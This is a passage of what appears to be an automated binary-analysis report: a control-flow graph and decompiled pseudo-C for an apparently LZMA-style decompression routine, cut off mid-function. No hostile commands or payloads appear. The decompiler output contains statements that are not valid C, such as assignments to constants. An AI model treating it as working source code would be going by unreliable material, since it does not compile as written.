                                                                                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 809 406bb0-406bd3 810 406bd5-406bd8 809->810 811 406bdd-406be0 809->811 812 4075fd-407601 810->812 813 406be3-406bec 811->813 814 406bf2 813->814 815 4075fa 813->815 816 406bf9-406bfd 814->816 817 406d39-4073e0 814->817 818 406c9e-406ca2 814->818 819 406d0e-406d12 814->819 815->812 820 406c03-406c10 816->820 821 4075e5-4075f8 816->821 827 4073e2-4073f8 817->827 828 4073fa-407410 817->828 825 406ca8-406cc1 818->825 826 40754e-407558 818->826 822 406d18-406d2c 819->822 823 40755d-407567 819->823 820->815 829 406c16-406c5c 820->829 821->812 830 406d2f-406d37 822->830 823->821 831 406cc4-406cc8 825->831 826->821 832 407413-40741a 827->832 828->832 833 406c84-406c86 829->833 834 406c5e-406c62 829->834 830->817 830->819 831->818 835 406cca-406cd0 831->835 838 407441-40744d 832->838 839 40741c-407420 832->839 842 406c94-406c9c 833->842 843 406c88-406c92 833->843 840 406c64-406c67 GlobalFree 834->840 841 406c6d-406c7b GlobalAlloc 834->841 836 406cd2-406cd9 835->836 837 406cfa-406d0c 835->837 844 406ce4-406cf4 GlobalAlloc 836->844 845 406cdb-406cde GlobalFree 836->845 837->830 838->813 846 407426-40743e 839->846 847 4075cf-4075d9 839->847 840->841 841->815 849 406c81 841->849 842->831 843->842 843->843 844->815 844->837 845->844 846->838 847->821 849->833
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406BB0(void* __ecx) {
                                                                                    				void* _v8;
                                                                                    				void* _v12;
                                                                                    				signed int _v16;
                                                                                    				unsigned int _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _v32;
                                                                                    				signed int _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				signed int _v48;
                                                                                    				signed int _v52;
                                                                                    				signed int _v56;
                                                                                    				signed int _v60;
                                                                                    				signed int _v64;
                                                                                    				signed int _v68;
                                                                                    				signed int _v72;
                                                                                    				signed int _v76;
                                                                                    				signed int _v80;
                                                                                    				signed int _v84;
                                                                                    				signed int _v88;
                                                                                    				signed int _v92;
                                                                                    				signed int _v95;
                                                                                    				signed int _v96;
                                                                                    				signed int _v100;
                                                                                    				signed int _v104;
                                                                                    				signed int _v108;
                                                                                    				signed int _v112;
                                                                                    				signed int _v116;
                                                                                    				signed int _v120;
                                                                                    				intOrPtr _v124;
                                                                                    				signed int _v128;
                                                                                    				signed int _v132;
                                                                                    				signed int _v136;
                                                                                    				void _v140;
                                                                                    				void* _v148;
                                                                                    				signed int _t537;
                                                                                    				signed int _t538;
                                                                                    				signed int _t572;
                                                                                    
                                                                                    				_t572 = 0x22;
                                                                                    				_v148 = __ecx;
                                                                                    				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                    				if(_v52 == 0xffffffff) {
                                                                                    					return 1;
                                                                                    				}
                                                                                    				while(1) {
                                                                                    					L3:
                                                                                    					_t537 = _v140;
                                                                                    					if(_t537 > 0x1c) {
                                                                                    						break;
                                                                                    					}
                                                                                    					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                                    						case 0:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v116 = _v116 + 1;
                                                                                    							_t537 =  *_v116;
                                                                                    							__eflags = _t537 - 0xe1;
                                                                                    							if(_t537 > 0xe1) {
                                                                                    								goto L174;
                                                                                    							}
                                                                                    							_t542 = _t537 & 0x000000ff;
                                                                                    							_push(0x2d);
                                                                                    							asm("cdq");
                                                                                    							_pop(_t576);
                                                                                    							_push(9);
                                                                                    							_pop(_t577);
                                                                                    							_t622 = _t542 / _t576;
                                                                                    							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                    							asm("cdq");
                                                                                    							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                    							_v64 = _t617;
                                                                                    							_v32 = (1 << _t622) - 1;
                                                                                    							_v28 = (1 << _t544 / _t577) - 1;
                                                                                    							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                    							__eflags = 0x600 - _v124;
                                                                                    							if(0x600 == _v124) {
                                                                                    								L12:
                                                                                    								__eflags = _t625;
                                                                                    								if(_t625 == 0) {
                                                                                    									L14:
                                                                                    									_v76 = _v76 & 0x00000000;
                                                                                    									_v68 = _v68 & 0x00000000;
                                                                                    									goto L17;
                                                                                    								} else {
                                                                                    									goto L13;
                                                                                    								}
                                                                                    								do {
                                                                                    									L13:
                                                                                    									_t625 = _t625 - 1;
                                                                                    									__eflags = _t625;
                                                                                    									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                    								} while (_t625 != 0);
                                                                                    								goto L14;
                                                                                    							}
                                                                                    							__eflags = _v8;
                                                                                    							if(_v8 != 0) {
                                                                                    								GlobalFree(_v8);
                                                                                    							}
                                                                                    							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    							__eflags = _t537;
                                                                                    							_v8 = _t537;
                                                                                    							if(_t537 == 0) {
                                                                                    								goto L174;
                                                                                    							} else {
                                                                                    								_v124 = 0x600;
                                                                                    								goto L12;
                                                                                    							}
                                                                                    						case 1:
                                                                                    							L15:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 1;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                    							_v116 = _v116 + 1;
                                                                                    							_t50 =  &_v76;
                                                                                    							 *_t50 = _v76 + 1;
                                                                                    							__eflags =  *_t50;
                                                                                    							L17:
                                                                                    							__eflags = _v76 - 4;
                                                                                    							if(_v76 < 4) {
                                                                                    								goto L15;
                                                                                    							}
                                                                                    							_t550 = _v68;
                                                                                    							__eflags = _t550 - _v120;
                                                                                    							if(_t550 == _v120) {
                                                                                    								L22:
                                                                                    								_v76 = 5;
                                                                                    								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                    								goto L25;
                                                                                    							}
                                                                                    							__eflags = _v12;
                                                                                    							_v120 = _t550;
                                                                                    							if(_v12 != 0) {
                                                                                    								GlobalFree(_v12);
                                                                                    							}
                                                                                    							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                    							__eflags = _t537;
                                                                                    							_v12 = _t537;
                                                                                    							if(_t537 == 0) {
                                                                                    								goto L174;
                                                                                    							} else {
                                                                                    								goto L22;
                                                                                    							}
                                                                                    						case 2:
                                                                                    							L26:
                                                                                    							_t557 = _v100 & _v32;
                                                                                    							_v136 = 6;
                                                                                    							_v80 = _t557;
                                                                                    							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                    							goto L135;
                                                                                    						case 3:
                                                                                    							L23:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 3;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_t72 =  &_v116;
                                                                                    							 *_t72 = _v116 + 1;
                                                                                    							__eflags =  *_t72;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							L25:
                                                                                    							_v76 = _v76 - 1;
                                                                                    							__eflags = _v76;
                                                                                    							if(_v76 != 0) {
                                                                                    								goto L23;
                                                                                    							}
                                                                                    							goto L26;
                                                                                    						case 4:
                                                                                    							L136:
                                                                                    							_t559 =  *_t626;
                                                                                    							_t610 = _t559 & 0x0000ffff;
                                                                                    							_t591 = (_v20 >> 0xb) * _t610;
                                                                                    							__eflags = _v16 - _t591;
                                                                                    							if(_v16 >= _t591) {
                                                                                    								_v20 = _v20 - _t591;
                                                                                    								_v16 = _v16 - _t591;
                                                                                    								_v68 = 1;
                                                                                    								_t560 = _t559 - (_t559 >> 5);
                                                                                    								__eflags = _t560;
                                                                                    								 *_t626 = _t560;
                                                                                    							} else {
                                                                                    								_v20 = _t591;
                                                                                    								_v68 = _v68 & 0x00000000;
                                                                                    								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                    							}
                                                                                    							__eflags = _v20 - 0x1000000;
                                                                                    							if(_v20 >= 0x1000000) {
                                                                                    								goto L142;
                                                                                    							} else {
                                                                                    								goto L140;
                                                                                    							}
                                                                                    						case 5:
                                                                                    							L140:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 5;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							_v20 = _v20 << 8;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_t464 =  &_v116;
                                                                                    							 *_t464 = _v116 + 1;
                                                                                    							__eflags =  *_t464;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							L142:
                                                                                    							_t561 = _v136;
                                                                                    							goto L143;
                                                                                    						case 6:
                                                                                    							__edx = 0;
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								__eax = _v8;
                                                                                    								__ecx = _v60;
                                                                                    								_v56 = 1;
                                                                                    								_v136 = 7;
                                                                                    								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                    								goto L135;
                                                                                    							}
                                                                                    							__eax = _v96 & 0x000000ff;
                                                                                    							__esi = _v100;
                                                                                    							__cl = 8;
                                                                                    							__cl = 8 - _v64;
                                                                                    							__esi = _v100 & _v28;
                                                                                    							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                    							__ecx = _v64;
                                                                                    							__esi = (_v100 & _v28) << 8;
                                                                                    							__ecx = _v8;
                                                                                    							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                    							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                    							__eflags = _v60 - 4;
                                                                                    							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                    							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                    							if(_v60 >= 4) {
                                                                                    								__eflags = _v60 - 0xa;
                                                                                    								if(_v60 >= 0xa) {
                                                                                    									_t103 =  &_v60;
                                                                                    									 *_t103 = _v60 - 6;
                                                                                    									__eflags =  *_t103;
                                                                                    								} else {
                                                                                    									_v60 = _v60 - 3;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_v60 = 0;
                                                                                    							}
                                                                                    							__eflags = _v56 - __edx;
                                                                                    							if(_v56 == __edx) {
                                                                                    								__ebx = 0;
                                                                                    								__ebx = 1;
                                                                                    								goto L63;
                                                                                    							}
                                                                                    							__eax = _v24;
                                                                                    							__eax = _v24 - _v48;
                                                                                    							__eflags = __eax - _v120;
                                                                                    							if(__eax >= _v120) {
                                                                                    								__eax = __eax + _v120;
                                                                                    								__eflags = __eax;
                                                                                    							}
                                                                                    							__ecx = _v12;
                                                                                    							__ebx = 0;
                                                                                    							__ebx = 1;
                                                                                    							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                    							goto L43;
                                                                                    						case 7:
                                                                                    							__eflags = _v68 - 1;
                                                                                    							if(_v68 != 1) {
                                                                                    								__eax = _v40;
                                                                                    								_v132 = 0x16;
                                                                                    								_v36 = _v40;
                                                                                    								__eax = _v44;
                                                                                    								_v40 = _v44;
                                                                                    								__eax = _v48;
                                                                                    								_v44 = _v48;
                                                                                    								__eax = 0;
                                                                                    								__eflags = _v60 - 7;
                                                                                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    								__al = __al & 0x000000fd;
                                                                                    								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                    								__eax = _v8;
                                                                                    								__eax = _v8 + 0x664;
                                                                                    								__eflags = __eax;
                                                                                    								_v92 = __eax;
                                                                                    								goto L71;
                                                                                    							}
                                                                                    							__eax = _v8;
                                                                                    							__ecx = _v60;
                                                                                    							_v136 = 8;
                                                                                    							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                    							goto L135;
                                                                                    						case 8:
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								__eax = _v8;
                                                                                    								__ecx = _v60;
                                                                                    								_v136 = 0xa;
                                                                                    								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                    							} else {
                                                                                    								__eax = _v60;
                                                                                    								__ecx = _v8;
                                                                                    								__eax = _v60 + 0xf;
                                                                                    								_v136 = 9;
                                                                                    								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                    								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                    							}
                                                                                    							goto L135;
                                                                                    						case 9:
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								goto L92;
                                                                                    							}
                                                                                    							__eflags = _v100;
                                                                                    							if(_v100 == 0) {
                                                                                    								goto L174;
                                                                                    							}
                                                                                    							__eax = 0;
                                                                                    							__eflags = _v60 - 7;
                                                                                    							_t264 = _v60 - 7 >= 0;
                                                                                    							__eflags = _t264;
                                                                                    							0 | _t264 = _t264 + _t264 + 9;
                                                                                    							_v60 = _t264 + _t264 + 9;
                                                                                    							goto L78;
                                                                                    						case 0xa:
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								__eax = _v8;
                                                                                    								__ecx = _v60;
                                                                                    								_v136 = 0xb;
                                                                                    								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                    								goto L135;
                                                                                    							}
                                                                                    							__eax = _v44;
                                                                                    							goto L91;
                                                                                    						case 0xb:
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								__ecx = _v40;
                                                                                    								__eax = _v36;
                                                                                    								_v36 = _v40;
                                                                                    							} else {
                                                                                    								__eax = _v40;
                                                                                    							}
                                                                                    							__ecx = _v44;
                                                                                    							_v40 = _v44;
                                                                                    							L91:
                                                                                    							__ecx = _v48;
                                                                                    							_v48 = __eax;
                                                                                    							_v44 = _v48;
                                                                                    							L92:
                                                                                    							__eax = _v8;
                                                                                    							_v132 = 0x15;
                                                                                    							__eax = _v8 + 0xa68;
                                                                                    							_v92 = _v8 + 0xa68;
                                                                                    							goto L71;
                                                                                    						case 0xc:
                                                                                    							L102:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 0xc;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v116;
                                                                                    							__eax = _v16;
                                                                                    							_v20 = _v20 << 8;
                                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							_t340 =  &_v116;
                                                                                    							 *_t340 = _v116 + 1;
                                                                                    							__eflags =  *_t340;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							__eax = _v48;
                                                                                    							goto L104;
                                                                                    						case 0xd:
                                                                                    							L39:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 0xd;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v116;
                                                                                    							__eax = _v16;
                                                                                    							_v20 = _v20 << 8;
                                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							_t127 =  &_v116;
                                                                                    							 *_t127 = _v116 + 1;
                                                                                    							__eflags =  *_t127;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							L41:
                                                                                    							__eax = _v68;
                                                                                    							__eflags = _v76 - _v68;
                                                                                    							if(_v76 != _v68) {
                                                                                    								goto L50;
                                                                                    							}
                                                                                    							__eflags = __ebx - 0x100;
                                                                                    							if(__ebx >= 0x100) {
                                                                                    								goto L56;
                                                                                    							}
                                                                                    							L43:
                                                                                    							__eax = _v95 & 0x000000ff;
                                                                                    							_v95 = _v95 << 1;
                                                                                    							__ecx = _v92;
                                                                                    							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                    							_v76 = __eax;
                                                                                    							__eax = __eax + 1;
                                                                                    							__eax = __eax << 8;
                                                                                    							__eax = __eax + __ebx;
                                                                                    							__esi = _v92 + __eax * 2;
                                                                                    							_v20 = _v20 >> 0xb;
                                                                                    							__ax =  *__esi;
                                                                                    							_v88 = __esi;
                                                                                    							__edx = __ax & 0x0000ffff;
                                                                                    							__ecx = (_v20 >> 0xb) * __edx;
                                                                                    							__eflags = _v16 - __ecx;
                                                                                    							if(_v16 >= __ecx) {
                                                                                    								_v20 = _v20 - __ecx;
                                                                                    								_v16 = _v16 - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								_v68 = 1;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eflags = __eax;
                                                                                    								__ebx = __ebx + __ebx + 1;
                                                                                    								 *__esi = __ax;
                                                                                    							} else {
                                                                                    								_v68 = _v68 & 0x00000000;
                                                                                    								_v20 = __ecx;
                                                                                    								0x800 = 0x800 - __edx;
                                                                                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags = _v20 - 0x1000000;
                                                                                    							_v72 = __ebx;
                                                                                    							if(_v20 >= 0x1000000) {
                                                                                    								goto L41;
                                                                                    							} else {
                                                                                    								goto L39;
                                                                                    							}
                                                                                    						case 0xe:
                                                                                    							L48:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 0xe;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v116;
                                                                                    							__eax = _v16;
                                                                                    							_v20 = _v20 << 8;
                                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							_t161 =  &_v116;
                                                                                    							 *_t161 = _v116 + 1;
                                                                                    							__eflags =  *_t161;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							while(1) {
                                                                                    								L50:
                                                                                    								__eflags = __ebx - 0x100;
                                                                                    								if(__ebx >= 0x100) {
                                                                                    									break;
                                                                                    								}
                                                                                    								__eax = _v92;
                                                                                    								__edx = __ebx + __ebx;
                                                                                    								__ecx = _v20;
                                                                                    								__esi = __edx + __eax;
                                                                                    								__ecx = _v20 >> 0xb;
                                                                                    								__ax =  *__esi;
                                                                                    								_v88 = __esi;
                                                                                    								__edi = __ax & 0x0000ffff;
                                                                                    								__ecx = (_v20 >> 0xb) * __edi;
                                                                                    								__eflags = _v16 - __ecx;
                                                                                    								if(_v16 >= __ecx) {
                                                                                    									_v20 = _v20 - __ecx;
                                                                                    									_v16 = _v16 - __ecx;
                                                                                    									__cx = __ax;
                                                                                    									_t175 = __edx + 1; // 0x1
                                                                                    									__ebx = _t175;
                                                                                    									__cx = __ax >> 5;
                                                                                    									__eflags = __eax;
                                                                                    									 *__esi = __ax;
                                                                                    								} else {
                                                                                    									_v20 = __ecx;
                                                                                    									0x800 = 0x800 - __edi;
                                                                                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    									__ebx = __ebx + __ebx;
                                                                                    									 *__esi = __cx;
                                                                                    								}
                                                                                    								__eflags = _v20 - 0x1000000;
                                                                                    								_v72 = __ebx;
                                                                                    								if(_v20 >= 0x1000000) {
                                                                                    									continue;
                                                                                    								} else {
                                                                                    									goto L48;
                                                                                    								}
                                                                                    							}
                                                                                    							L56:
                                                                                    							_t178 =  &_v56;
                                                                                    							 *_t178 = _v56 & 0x00000000;
                                                                                    							__eflags =  *_t178;
                                                                                    							goto L57;
                                                                                    						case 0xf:
                                                                                    							L60:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 0xf;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v116;
                                                                                    							__eax = _v16;
                                                                                    							_v20 = _v20 << 8;
                                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							_t208 =  &_v116;
                                                                                    							 *_t208 = _v116 + 1;
                                                                                    							__eflags =  *_t208;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							L62:
                                                                                    							__eflags = __ebx - 0x100;
                                                                                    							if(__ebx >= 0x100) {
                                                                                    								L57:
                                                                                    								__al = _v72;
                                                                                    								_v96 = _v72;
                                                                                    								goto L58;
                                                                                    							}
                                                                                    							L63:
                                                                                    							__eax = _v92;
                                                                                    							__edx = __ebx + __ebx;
                                                                                    							__ecx = _v20;
                                                                                    							__esi = __edx + __eax;
                                                                                    							__ecx = _v20 >> 0xb;
                                                                                    							__ax =  *__esi;
                                                                                    							_v88 = __esi;
                                                                                    							__edi = __ax & 0x0000ffff;
                                                                                    							__ecx = (_v20 >> 0xb) * __edi;
                                                                                    							__eflags = _v16 - __ecx;
                                                                                    							if(_v16 >= __ecx) {
                                                                                    								_v20 = _v20 - __ecx;
                                                                                    								_v16 = _v16 - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								_t222 = __edx + 1; // 0x1
                                                                                    								__ebx = _t222;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eflags = __eax;
                                                                                    								 *__esi = __ax;
                                                                                    							} else {
                                                                                    								_v20 = __ecx;
                                                                                    								0x800 = 0x800 - __edi;
                                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags = _v20 - 0x1000000;
                                                                                    							_v72 = __ebx;
                                                                                    							if(_v20 >= 0x1000000) {
                                                                                    								goto L62;
                                                                                    							} else {
                                                                                    								goto L60;
                                                                                    							}
                                                                                    						case 0x10:
                                                                                    							L112:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 0x10;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v116;
                                                                                    							__eax = _v16;
                                                                                    							_v20 = _v20 << 8;
                                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							_t371 =  &_v116;
                                                                                    							 *_t371 = _v116 + 1;
                                                                                    							__eflags =  *_t371;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							goto L114;
                                                                                    						case 0x11:
                                                                                    							L71:
                                                                                    							__esi = _v92;
                                                                                    							_v136 = 0x12;
                                                                                    							goto L135;
                                                                                    						case 0x12:
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								__eax = _v92;
                                                                                    								_v136 = 0x13;
                                                                                    								__esi = _v92 + 2;
                                                                                    								L135:
                                                                                    								_v88 = _t626;
                                                                                    								goto L136;
                                                                                    							}
                                                                                    							__eax = _v80;
                                                                                    							_v52 = _v52 & 0x00000000;
                                                                                    							__ecx = _v92;
                                                                                    							__eax = _v80 << 4;
                                                                                    							__eflags = __eax;
                                                                                    							__eax = _v92 + __eax + 4;
                                                                                    							goto L133;
                                                                                    						case 0x13:
                                                                                    							__eflags = _v68;
                                                                                    							if(_v68 != 0) {
                                                                                    								_t475 =  &_v92;
                                                                                    								 *_t475 = _v92 + 0x204;
                                                                                    								__eflags =  *_t475;
                                                                                    								_v52 = 0x10;
                                                                                    								_v68 = 8;
                                                                                    								L147:
                                                                                    								_v128 = 0x14;
                                                                                    								goto L148;
                                                                                    							}
                                                                                    							__eax = _v80;
                                                                                    							__ecx = _v92;
                                                                                    							__eax = _v80 << 4;
                                                                                    							_v52 = 8;
                                                                                    							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                    							L133:
                                                                                    							_v92 = __eax;
                                                                                    							_v68 = 3;
                                                                                    							goto L147;
                                                                                    						case 0x14:
                                                                                    							_v52 = _v52 + __ebx;
                                                                                    							__eax = _v132;
                                                                                    							goto L143;
                                                                                    						case 0x15:
                                                                                    							__eax = 0;
                                                                                    							__eflags = _v60 - 7;
                                                                                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    							__al = __al & 0x000000fd;
                                                                                    							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                    							goto L123;
                                                                                    						case 0x16:
                                                                                    							__eax = _v52;
                                                                                    							__eflags = __eax - 4;
                                                                                    							if(__eax >= 4) {
                                                                                    								_push(3);
                                                                                    								_pop(__eax);
                                                                                    							}
                                                                                    							__ecx = _v8;
                                                                                    							_v68 = 6;
                                                                                    							__eax = __eax << 7;
                                                                                    							_v128 = 0x19;
                                                                                    							_v92 = __eax;
                                                                                    							goto L148;
                                                                                    						case 0x17:
                                                                                    							L148:
                                                                                    							__eax = _v68;
                                                                                    							_v84 = 1;
                                                                                    							_v76 = _v68;
                                                                                    							goto L152;
                                                                                    						case 0x18:
                                                                                    							L149:
                                                                                    							__eflags = _v112;
                                                                                    							if(_v112 == 0) {
                                                                                    								_v140 = 0x18;
                                                                                    								goto L173;
                                                                                    							}
                                                                                    							__ecx = _v116;
                                                                                    							__eax = _v16;
                                                                                    							_v20 = _v20 << 8;
                                                                                    							__ecx =  *_v116 & 0x000000ff;
                                                                                    							_v112 = _v112 - 1;
                                                                                    							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							_t490 =  &_v116;
                                                                                    							 *_t490 = _v116 + 1;
                                                                                    							__eflags =  *_t490;
                                                                                    							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                    							L151:
                                                                                    							_t493 =  &_v76;
                                                                                    							 *_t493 = _v76 - 1;
                                                                                    							__eflags =  *_t493;
                                                                                    							L152:
                                                                                    							__eflags = _v76;
                                                                                    							if(_v76 <= 0) {
                                                                                    								__ecx = _v68;
                                                                                    								__ebx = _v84;
                                                                                    								0 = 1;
                                                                                    								__eax = 1 << __cl;
                                                                                    								__ebx = _v84 - (1 << __cl);
                                                                                    								__eax = _v128;
                                                                                    								_v72 = __ebx;
                                                                                    								L143:
                                                                                    								_v140 = _t561;
                                                                                    								goto L3;
                                                                                    							}
                                                                                    							__eax = _v84;
                                                                                    							_v20 = _v20 >> 0xb;
                                                                                    							__edx = _v84 + _v84;
                                                                                    							__eax = _v92;
                                                                                    							__esi = __edx + __eax;
                                                                                    							_v88 = __esi;
                                                                                    							__ax =  *__esi;
                                                                                    							__edi = __ax & 0x0000ffff;
                                                                                    							__ecx = (_v20 >> 0xb) * __edi;
                                                                                    							__eflags = _v16 - __ecx;
                                                                                    							if(_v16 >= __ecx) {
                                                                                    								_v20 = _v20 - __ecx;
                                                                                    								_v16 = _v16 - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eax = __eax - __ecx;
                                                                                    								__edx = __edx + 1;
                                                                                    								__eflags = __edx;
                                                                                    								 *__esi = __ax;
                                                                                    								_v84 = __edx;
                                                                                    							} else {
                                                                                    								_v20 = __ecx;
                                                                                    								0x800 = 0x800 - __edi;
                                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    								_v84 = _v84 << 1;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags = _v20 - 0x1000000;
                                                                                    							if(_v20 >= 0x1000000) {
                                                                                    								goto L151;
                                                                                    							} else {
                                                                                    								goto L149;
                                                                                    							}
                                                                                    						case 0x19:
                                                                                    							__eflags = __ebx - 4;
                                                                                    							if(__ebx < 4) {
                                                                                    								_v48 = __ebx;
                                                                                    								L122:
                                                                                    								_t399 =  &_v48;
                                                                                    								 *_t399 = _v48 + 1;
                                                                                    								__eflags =  *_t399;
                                                                                    								L123:
                                                                                    								__eax = _v48;
                                                                                    								__eflags = __eax;
                                                                                    								if(__eax == 0) {
                                                                                    									_v52 = _v52 | 0xffffffff;
                                                                                    									goto L173;
                                                                                    								}
                                                                                    								__eflags = __eax - _v100;
                                                                                    								if(__eax > _v100) {
                                                                                    									goto L174;
                                                                                    								}
                                                                                    								_v52 = _v52 + 2;
                                                                                    								__eax = _v52;
                                                                                    								_t406 =  &_v100;
                                                                                    								 *_t406 = _v100 + _v52;
                                                                                    								__eflags =  *_t406;
                                                                                    								goto L126;
